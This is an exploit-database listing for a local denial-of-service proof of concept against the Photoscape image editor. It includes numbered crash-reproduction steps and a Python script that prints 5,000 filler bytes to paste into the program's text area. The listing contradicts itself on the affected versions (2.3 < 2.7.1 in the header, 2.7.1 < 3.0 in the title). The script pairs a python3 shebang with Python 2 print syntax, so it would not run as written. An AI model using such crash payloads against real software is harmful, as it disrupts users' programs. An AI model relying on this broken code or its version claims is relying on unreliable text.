Photoscape 2.3 < 2.7.1 Denial of Service

2020.04.10
tr HexraiN (TR) tr
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Photoscape 2.7.1 < 3.0 - 'Textarea' Denial of Service (PoC) # Author: HexraiN # Date: 2020-04-10 # Vendor Homepage: http://www.photoscape.org/ # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Parrot OS , Windows 10 Steps to Produce the Crash: 1.- Run Python Exploit 2.- Copy output to clipboard 3.- Open Photoscape 4.- Select Any image 5.- Go To Menu > Object and select Create 6.- Paste ClipBoard on "Textarea" 7.- Crashed.. #!/usr/bin/python3 buf = "" buf += "\x90"*5000 print buf


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top